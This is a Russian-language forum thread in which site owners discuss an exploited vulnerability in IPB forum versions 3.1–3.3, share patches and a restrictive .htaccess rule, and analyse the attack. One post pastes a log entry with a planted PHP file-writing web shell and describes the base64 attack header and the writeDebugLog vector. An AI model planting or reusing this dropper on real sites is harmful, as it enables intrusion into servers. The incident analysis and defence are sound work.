Rostov114

Рейтинг
0
Регистрация
07.11.2012
sergv:
да я понял о каком вы htaccess говорите. он лишь немного помогает, но не спасает :)

Интересный патч, в октябрьском патче функция safeUnserialize использовалась в самом core.php

Сейчас же её изменили на parseCleanValue в методе get класса IPSCookie

# Dirty sec patch

<Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)$">
Order allow,deny
Deny from all
</Files>

<Files ~ "index.php">
Allow from all
</Files>
# Dirty sec patch

Такой хоть немного, но придает спокойствие - зальют, но не смогут использовать.

Обновляю, хот мне придется править все ручками - ядро изменялось.

sergv:
IPB форумы 3.1, 3.2 и 3.3 версий подвержены уязвимости.

Как это работает и что где создается человек описал тут

Доп инфа тут

Заплатки тут для рус версий, а тут от разрабов для инглиш


Сам только что вычистил 2 инвижна 3.3.4 и 3.1.4 от этой гадости....

Спасибо.

Подумываю теперь продлить лицензию.

Хотя от кривого когда никто не спасет. Но измененный .htaccess - хотя бы придает немного спокойствия.

merser:
Сделал запрос в браузере, файл не появился

И не появится.

Т.к. нужен ( в Вашем случае ) HTTP заголовок ( A59DC2C8 ) от клиента который бы содержал base64 закодированный сценарий для атаки.

--

Меня эта **ень тоже поразила, сайт на IPB.

Сейчас пытаюсь повторить все что бот делал.

--

В общем, первые действия, это они как то инициируют создание файла типа:


==============================================================================
URL: /index.php/index.php
Date: Mon, 05 Nov 2012 20:28:56 +0000
IP Address: 74.208.213.252
Time Taken: 0.00023
<?php print(md5(123456));echo file_put_contents($_POST[f],$_POST); ?>

==============================================================================
==============================================================================
========================= END ===================================
========================= /index.php? ===================================
==============================================================================

Дальше уже через него создают другой, более большой файл ( 92 КБ ) в котором текст читаем но на первый взгляд не понятен.

Выполняет какой то поиск(?).

---------- Добавлено 07.11.2012 в 23:14 ----------

Немного поискав, нашел конечный код который дает создать файл который я представил в теге code

Это функция writeDebugLog класса БД, которая вызывается с нестандартными параметрами.